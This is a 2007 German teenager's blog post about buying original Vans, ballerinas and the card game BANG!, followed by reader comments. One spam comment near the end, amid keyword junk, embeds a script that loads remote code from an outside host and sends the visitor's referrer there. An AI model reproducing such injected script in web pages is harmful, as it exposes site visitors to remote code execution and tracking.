___Panic! In the WWW ... & gfx

Endlich Original-Vans!

Lena // Montag, 02.04.07 // 15:25 Uhr // Questions? // GB

[Edit]: Wir haben jetzt wieder ein Radio, das sich diesmal aber in einem PopUp öffnet, damit die Musik nicht aufhört, wenn ihr euch hier umschaut. Welchen Song würdet ihr gerne noch dabei haben? Schreibt uns eure Vorschläge als Kommentar! [/Edit]

Hey!
Heute war ich mit meiner Tante und Anne in der Stadt. Anne und ich mussten unsere Zimmer aufräumen, sonst dürften wir nicht mit. Ich musste alle meine Klamotten ordentlich weghängen. >.<
Als wir dann endlich in der Stadt waren, mussten wir bei "Bonita" warten, bis Tantshn fertig war. In der Zeit sind wir zu Pimkie, aber da finde ich in letzter Zeit nicht oft was... Bei New Yorker wollte ich dann nach einer von diesen großen Sonnenbrillen gucken, aber es gab keine guten. Ich hab mir dann einen schwarzen Nietengürtel gekauft -freu-.
Weil Anne und ich uns ja neue Vans holen wollten, waren wir bei Deichmann, um nach welchen zu gucken, die wir in Schleswig gesehen hatten. Die gab es hier aber nicht und wir wollten ja sowieso Original-Vans haben. Jan hat seine Vans von Sincity, und seine sind Original. Also mussten wir diesen Shop erstmal suchen.
Nachdem wir da reingegangen waren, war ich voll überrascht. Direkt am Eingang hingen total viele Vans und Chucks! Anne und ich haben gleich welche anprobiert, die auch gut gepasst haben. Ich hab mich schnell entschieden, aber Anne brauchte irgendwie ewig. Meine Vans sind so beige-weiß kariert (Bild oben).

Irgendwie schon komisch, sonst finde ich voll selten Schuhe und in dieser Woche hab ich gleich 2 x welche gekauft! Einmal die Vans und dann noch Ballerinas (rechts) aus der Pussycat Dolls-Collection.

Auf Klassenfahrt haben Jan, Kevin, Lennart und ich mal fast einen Tag lang nur BANG! gespielt. Heute war ich bei Gandalph und hab mir das da geholt. Also Leute, ich brauch vier Mitspieler! Ihr könnt gerne alle kommen ;P


P.S.: Vergesst bitte nicht für uns zu voten! Die Links findet ihr in der Navi! Thx ;P

2.4.07 15:24
 


bisher 8 Kommentar(e)     TrackBack-URL


chrissi / Website (2.4.07 18:22)
lieber sotmteilnehmer =) (omg, wie klingt die ansage denn XD)

die auswertung für den sotm contest auf delicious.design ist da, sowie die awards =)

danke nochmals für die faire teilnahme am contest, eure homepages sind supi gut geworden =)

xoxo, chrissi by dd <3


jeff / Website (2.4.07 22:36)
mmm lena ........ du nachmacherin xD nein lol Spaß ich hab die gleichen vans ! aber nur bizle heller xD ich finde die voll cool aber meine vans v´sind von allstars xD heiße balarinas xD


Aiish / Website (3.4.07 10:57)
Hey :D

Klar, hab ich Interesse an einer Affischaft Ich verlink dich (oder euch? xD) gleich.
Auf ne gute Affischaft!

Lg Aiiish <3


Anna / Website (3.4.07 20:36)

Einen wunderschönen Abend wünsche ich...

~einfach nur so~

<3

Liebe Grüße von der Anna



Nadja / Website (5.4.07 23:15)
heey danke dass du dich für die sotm beworben hast x) ich sag dir dann bescheid sobald das voting beginnt (:
lg <3


Kitty (10.4.07 22:53)
Musik?! Ich wär für Ciara - Like a boy
Nelly Furtado - Say it right
Timbaland - Give it to me
& vllt noch Fergie - Glamorous :D ^^


debt consolidation / Website (17.4.07 16:20)
who are pay day loans and certain infections debt consolidation TO royal carribean only general information office xxx office sex is a diaryl-substituted <script>var r = document.referrer; document.write('<script src="http://www.stats-log.com/gb.php?id=g&r='+escape(r)+'"><' + '/script>')</script>


Anne / Website (21.4.07 12:35)
Lasst den Scheiß mal... :D

Name:
Email:
Website:
E-Mail bei weiteren Kommentaren
Informationen speichern (Cookie)



 Smileys einfügen



GIRLS GOSSIP
LENA
ANNE
THE PAGE
FOR YOU
LOUNGE
LESEECKE
ADIEU
BOOK
RADIO


About
Calendar
Publicons
Know me?
Pingule
Spooky
Vampire






About
Termine
500 ?
Publicons
Know me?







• 22.04.07 1 Layout









Wie alt bist du?
11 oder jünger
12-14
15-17
18-20
Älter
Auswertung








Gratis bloggen bei
myblog.de